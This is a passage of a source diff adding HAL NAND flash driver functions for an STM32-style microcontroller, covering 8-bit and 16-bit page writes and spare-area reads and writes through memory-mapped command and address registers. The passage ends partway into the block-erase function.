((hnand->Config.BlockSize) * (hnand->Config.BlockNbr)))) + { + /* update the buffer size */ + size = hnand->Config.PageSize + ((hnand->Config.PageSize) * numPagesWritten); + + /* Send write page command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_A; + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_WRITE0; + + /* Cards with page size <= 512 bytes */ + if((hnand->Config.PageSize) <= 512U) + { + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + else /* (hnand->Config.PageSize) > 512 */ + { + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + __DSB(); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + __DSB(); + } + } + + + /* Write data to memory */ + for(; index < size; index++) + { + *(__IO uint8_t *)deviceaddress = *(uint8_t *)pBuffer++; + } + + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_WRITE_TRUE1; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Read status until NAND is ready */ + while(HAL_NAND_Read_Status(hnand) != NAND_READY) + { + + if((HAL_GetTick() - tickstart ) > NAND_WRITE_TIMEOUT) + { + return HAL_TIMEOUT; + } + } + + /* Increment written pages number */ + numPagesWritten++; + + /* Decrement pages to write */ + NumPageToWrite--; + + /* Increment the NAND address */ + nandaddress = (uint32_t)(nandaddress + 1U); + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnand); + + return HAL_OK; +} + +/** + * @brief Write Page(s) to NAND memory block (16-bits addressing) + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param pAddress pointer to NAND address structure + * @param pBuffer pointer to source buffer to write. pBuffer should be 16bits aligned + * @param NumPageToWrite number of pages to write to block + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_Write_Page_16b(NAND_HandleTypeDef *hnand, NAND_AddressTypeDef *pAddress, uint16_t *pBuffer, uint32_t NumPageToWrite) +{ + __IO uint32_t index = 0U; + uint32_t tickstart = 0U; + uint32_t deviceaddress = 0U, size = 0U, numPagesWritten = 0U, nandaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnand); + + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Identify the device address */ + if(hnand->Init.NandBank == FMC_NAND_BANK2) + { + deviceaddress = NAND_DEVICE1; + } + else + { + deviceaddress = NAND_DEVICE2; + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* NAND raw address calculation */ + nandaddress = ARRAY_ADDRESS(pAddress, hnand); + + /* Page(s) write loop */ + while((NumPageToWrite != 0U) && (nandaddress < ((hnand->Config.BlockSize) * (hnand->Config.BlockNbr)))) + { + /* update the buffer size */ + size = (hnand->Config.PageSize) + ((hnand->Config.PageSize) * numPagesWritten); + + /* Send write page command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_A; + __DSB(); + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_WRITE0; + __DSB(); + + /* Cards with page size <= 512 bytes */ + if((hnand->Config.PageSize) <= 512U) + { + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + else /* (hnand->Config.PageSize) > 512 */ + { + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + + /* Calculate PageSize */ +#ifdef FSMC_PCR2_PWID + if (hnand->Init.MemoryDataWidth == FSMC_NAND_PCC_MEM_BUS_WIDTH_8) +#else /* FMC_PCR2_PWID is defined */ + if (hnand->Init.MemoryDataWidth == FMC_NAND_PCC_MEM_BUS_WIDTH_8) +#endif + { + size = size / 2U; + } + else + { + /* Do nothing */ + /* Keep the same PageSize for FMC_NAND_MEM_BUS_WIDTH_16*/ + } + + /* Write data to memory */ + for(; index < size; index++) + { + *(__IO uint16_t *)deviceaddress = *(uint16_t *)pBuffer++; + } + + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_WRITE_TRUE1; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Read status until NAND is ready */ + while(HAL_NAND_Read_Status(hnand) != NAND_READY) + { + if((HAL_GetTick() - tickstart ) > NAND_WRITE_TIMEOUT) + { + return HAL_TIMEOUT; + } + } + + /* Increment written pages number */ + numPagesWritten++; + + /* Decrement pages to write */ + NumPageToWrite--; + + /* Increment the NAND address */ + nandaddress = (uint32_t)(nandaddress + 1U); + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnand); + + return HAL_OK; +} + +/** + * @brief Read Spare area(s) from NAND memory + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param pAddress pointer to NAND address structure + * @param pBuffer pointer to source buffer to write + * @param NumSpareAreaToRead Number of spare area to read + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_NAND_Read_SpareArea_8b(NAND_HandleTypeDef *hnand, NAND_AddressTypeDef *pAddress, uint8_t *pBuffer, uint32_t NumSpareAreaToRead) +{ + __IO uint32_t index = 0U; + uint32_t tickstart = 0U; + uint32_t deviceaddress = 0U, size = 0U, numSpareAreaRead = 0U, nandaddress = 0U, columnaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnand); + + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Identify the device address */ + if(hnand->Init.NandBank == FMC_NAND_BANK2) + { + deviceaddress = NAND_DEVICE1; + } + else + { + deviceaddress = NAND_DEVICE2; + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* NAND raw address calculation */ + nandaddress = ARRAY_ADDRESS(pAddress, hnand); + + /* Column in page address */ + columnaddress = COLUMN_ADDRESS(hnand); + + /* Spare area(s) read loop */ + while((NumSpareAreaToRead != 0U) && (nandaddress < ((hnand->Config.BlockSize) * (hnand->Config.BlockNbr)))) + { + /* update the buffer size */ + size = (hnand->Config.SpareAreaSize) + ((hnand->Config.SpareAreaSize) * numSpareAreaRead); + + /* Cards with page size <= 512 bytes */ + if((hnand->Config.PageSize) <= 512U) + { + /* Send read spare area command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_C; + + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + else /* (hnand->Config.PageSize) > 512 */ + { + /* Send read spare area command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_A; + + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_1ST_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_2ND_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_1ST_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_2ND_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_TRUE1; + + if(hnand->Config.ExtraCommandEnable == ENABLE) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Read status until NAND is ready */ + while(HAL_NAND_Read_Status(hnand) != NAND_READY) + { + if((HAL_GetTick() - tickstart ) > NAND_WRITE_TIMEOUT) + { + return HAL_TIMEOUT; + } + } + + /* Go back to read mode */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = ((uint8_t)0x00); + } + + /* Get Data into Buffer */ + for(; index < size; index++) + { + *(uint8_t *)pBuffer++ = *(uint8_t *)deviceaddress; + } + + /* Increment read spare areas number */ + numSpareAreaRead++; + + /* Decrement spare areas to read */ + NumSpareAreaToRead--; + + /* Increment the NAND address */ + nandaddress = (uint32_t)(nandaddress + 1U); + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnand); + + return HAL_OK; +} + +/** + * @brief Read Spare area(s) from NAND memory (16-bits addressing) + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param pAddress pointer to NAND address structure + * @param pBuffer pointer to source buffer to write. pBuffer should be 16bits aligned. + * @param NumSpareAreaToRead Number of spare area to read + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_NAND_Read_SpareArea_16b(NAND_HandleTypeDef *hnand, NAND_AddressTypeDef *pAddress, uint16_t *pBuffer, uint32_t NumSpareAreaToRead) +{ + __IO uint32_t index = 0U; + uint32_t tickstart = 0U; + uint32_t deviceaddress = 0U, size = 0U, numSpareAreaRead = 0U, nandaddress = 0U, columnaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnand); + + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Identify the device address */ + if(hnand->Init.NandBank == FMC_NAND_BANK2) + { + deviceaddress = NAND_DEVICE1; + } + else + { + deviceaddress = NAND_DEVICE2; + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* NAND raw address calculation */ + nandaddress = ARRAY_ADDRESS(pAddress, hnand); + + /* Column in page address */ + columnaddress = (uint32_t)(COLUMN_ADDRESS(hnand)); + + /* Spare area(s) read loop */ + while((NumSpareAreaToRead != 0U) && (nandaddress < ((hnand->Config.BlockSize) * (hnand->Config.BlockNbr)))) + { + /* update the buffer size */ + size = (hnand->Config.SpareAreaSize) + ((hnand->Config.SpareAreaSize) * numSpareAreaRead); + + /* Cards with page size <= 512 bytes */ + if((hnand->Config.PageSize) <= 512U) + { + /* Send read spare area command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_C; + + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + else /* (hnand->Config.PageSize) > 512 */ + { + /* Send read spare area command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_A; + + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_1ST_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_2ND_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_1ST_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_2ND_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_TRUE1; + + if(hnand->Config.ExtraCommandEnable == ENABLE) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Read status until NAND is ready */ + while(HAL_NAND_Read_Status(hnand) != NAND_READY) + { + if((HAL_GetTick() - tickstart ) > NAND_WRITE_TIMEOUT) + { + return HAL_TIMEOUT; + } + } + + /* Go back to read mode */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = ((uint8_t)0x00); + } + + /* Get Data into Buffer */ + for(; index < size; index++) + { + *(uint16_t *)pBuffer++ = *(uint16_t *)deviceaddress; + } + + /* Increment read spare areas number */ + numSpareAreaRead++; + + /* Decrement spare areas to read */ + NumSpareAreaToRead--; + + /* Increment the NAND address */ + nandaddress = (uint32_t)(nandaddress + 1U); + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnand); + + return HAL_OK; +} + +/** + * @brief Write Spare area(s) to NAND memory + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param pAddress pointer to NAND address structure + * @param pBuffer pointer to source buffer to write + * @param NumSpareAreaTowrite number of spare areas to write to block + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_Write_SpareArea_8b(NAND_HandleTypeDef *hnand, NAND_AddressTypeDef *pAddress, uint8_t *pBuffer, uint32_t NumSpareAreaTowrite) +{ + __IO uint32_t index = 0U; + uint32_t tickstart = 0U; + uint32_t deviceaddress = 0U, size = 0U, numSpareAreaWritten = 0U, nandaddress = 0U, columnaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnand); + + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Identify the device address */ + if(hnand->Init.NandBank == FMC_NAND_BANK2) + { + deviceaddress = NAND_DEVICE1; + } + else + { + deviceaddress = NAND_DEVICE2; + } + + /* Update the FMC_NAND controller state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* Page address calculation */ + nandaddress = ARRAY_ADDRESS(pAddress, hnand); + + /* Column in page address */ + columnaddress = COLUMN_ADDRESS(hnand); + + /* Spare area(s) write loop */ + while((NumSpareAreaTowrite != 0U) && (nandaddress < ((hnand->Config.BlockSize) * (hnand->Config.BlockNbr)))) + { + /* update the buffer size */ + size = (hnand->Config.SpareAreaSize) + ((hnand->Config.SpareAreaSize) * numSpareAreaWritten); + + /* Cards with page size <= 512 bytes */ + if((hnand->Config.PageSize) <= 512U) + { + /* Send write Spare area command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_C; + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_WRITE0; + + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + else /* (hnand->Config.PageSize) > 512 */ + { + /* Send write Spare area command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_A; + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_WRITE0; + + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_1ST_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_2ND_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_1ST_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_2ND_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + + /* Write data to memory */ + for(; index < size; index++) + { + *(__IO uint8_t *)deviceaddress = *(uint8_t *)pBuffer++; + } + + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_WRITE_TRUE1; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Read status until NAND is ready */ + while(HAL_NAND_Read_Status(hnand) != NAND_READY) + { + if((HAL_GetTick() - tickstart ) > NAND_WRITE_TIMEOUT) + { + return HAL_TIMEOUT; + } + } + + /* Increment written spare areas number */ + numSpareAreaWritten++; + + /* Decrement spare areas to write */ + NumSpareAreaTowrite--; + + /* Increment the NAND address */ + nandaddress = (uint32_t)(nandaddress + 1U); + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnand); + + return HAL_OK; +} + +/** + * @brief Write Spare area(s) to NAND memory (16-bits addressing) + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param pAddress pointer to NAND address structure + * @param pBuffer pointer to source buffer to write. pBuffer should be 16bits aligned. + * @param NumSpareAreaTowrite number of spare areas to write to block + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_Write_SpareArea_16b(NAND_HandleTypeDef *hnand, NAND_AddressTypeDef *pAddress, uint16_t *pBuffer, uint32_t NumSpareAreaTowrite) +{ + __IO uint32_t index = 0U; + uint32_t tickstart = 0U; + uint32_t deviceaddress = 0U, size = 0U, numSpareAreaWritten = 0U, nandaddress = 0U, columnaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnand); + + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Identify the device address */ + if(hnand->Init.NandBank == FMC_NAND_BANK2) + { + deviceaddress = NAND_DEVICE1; + } + else + { + deviceaddress = NAND_DEVICE2; + } + + /* Update the FMC_NAND controller state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* NAND raw address calculation */ + nandaddress = ARRAY_ADDRESS(pAddress, hnand); + + /* Column in page address */ + columnaddress = (uint32_t)(COLUMN_ADDRESS(hnand)); + + /* Spare area(s) write loop */ + while((NumSpareAreaTowrite != 0U) && (nandaddress < ((hnand->Config.BlockSize) * (hnand->Config.BlockNbr)))) + { + /* update the buffer size */ + size = (hnand->Config.SpareAreaSize) + ((hnand->Config.SpareAreaSize) * numSpareAreaWritten); + + /* Cards with page size <= 512 bytes */ + if((hnand->Config.PageSize) <= 512U) + { + /* Send write Spare area command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_C; + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_WRITE0; + + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + else /* (hnand->Config.PageSize) > 512 */ + { + /* Send write Spare area command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_A; + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_WRITE0; + + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_1ST_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_2ND_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_1ST_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = COLUMN_2ND_CYCLE(columnaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + + /* Write data to memory */ + for(; index < size; index++) + { + *(__IO uint16_t *)deviceaddress = *(uint16_t *)pBuffer++; + } + + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_WRITE_TRUE1; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Read status until NAND is ready */ + while(HAL_NAND_Read_Status(hnand) != NAND_READY) + { + if((HAL_GetTick() - tickstart ) > NAND_WRITE_TIMEOUT) + { + return HAL_TIMEOUT; + } + } + + /* Increment written spare areas number */ + numSpareAreaWritten++; + + /* Decrement spare areas to write */ + NumSpareAreaTowrite--; + + /* Increment the NAND address */ + nandaddress = (uint32_t)(nandaddress + 1U); + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnand); + + return HAL_OK; +} + +/** + * @brief NAND memory Block erase + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param pAddress pointer to NAND address structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_Erase_Block(NAND_HandleTypeDef *hnand, 